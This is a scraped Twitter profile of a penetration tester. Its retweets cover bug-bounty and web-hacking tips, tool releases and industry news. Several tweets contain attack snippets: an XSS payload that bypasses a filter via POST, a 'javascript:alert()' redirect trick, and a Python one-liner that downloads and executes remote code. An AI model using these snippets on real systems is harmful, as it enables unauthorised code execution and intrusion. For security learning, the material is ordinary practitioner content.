Nate

@n8zwn

Family Life, Information Security and Assurance, Pentesting, Vulnerability Discovery, Outdoors

SLC, Utah
Joined: March 2009

Tweets

  1. Retweeted
    Feb 2

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

  2. Retweeted
    Jan 31

    I've been beta testing this update for a while, it's a good one :)

  3. Retweeted
    Jan 23

    For a stealthier usage, tick "Proxy > Options > Miscellaneous > Disable web interface"

  4. Retweeted
    Jan 24

    Excited to officially announce The Syndicate, our 4-person live hacking team. We are kicking off the year in San Francisco at . We will be donating 5% of all live event earnings to charity and 5% of our time to volunteering for all of 2020 and beyond.

  5. Retweeted
    Jan 26

    An excellent talk by : clear methodology, novel bugs and interesting links 💯

  6. Retweeted
    Jan 26

    GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'

  7. Retweeted
    Jan 25

    time: combine Arjun from with Burp Intruder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" RT & L

  8. Retweeted
    Jan 24

    Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("");exec(())' Let me know if anyone has a better way to do it, but this seems to work.

  9. Retweeted
    Jan 23

    I was bored and felt like sharing.. So I launched an "Instagram Live" session and pushed record. The session lasted roughly for an hour and contained about 28 questions and 35+ of my answers. Here's the "Director's Cut" trimmed for your pleasure.

  10. Retweeted
    Jan 22

    Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public.

  11. Retweeted
    Jan 22

    "We must use time as a tool, not as a crutch."

  12. Retweeted
    Dec 29, 2019

    2020 - Pay 6,000,613 USD in rewards - Celebrate 10 year anniversary - Meet more Bug Hunters!

  13. Retweeted
    Jan 16

    So you believe UUIDs are a sufficient protection against IDORs? Think again! 🤦 Thanks for the ,

  14. Retweeted
    Jan 10

    Just got laid off. 5+ years at Bugcrowd. What a journey I will need help finding something new. Guess 2020 will be the start of something by different Really tough day for me

  15. Retweeted
    Jan 12

    Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :)

  16. Retweeted
    Jan 12

    New series spoilers 🤐

  17. Retweeted
    Jan 14

    Back to blogging! CSRF-protected forms, Intruder, and no macros. A step-by-step walkthrough based on that you can follow along at home...

  18. Retweeted
    Jan 9

    Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fixes, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)

  19. Retweeted
    Jan 13

    When using as part of your arsenal, make sure to add --data-length=50 (or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open).

  20. Retweeted
    Jan 13

    While pentesting webapps, whenever you notice a redirect, check what caused it. If it's a client side redirect (caused by JavaScript), try redirecting to javascript:alert(), now you have XSS!
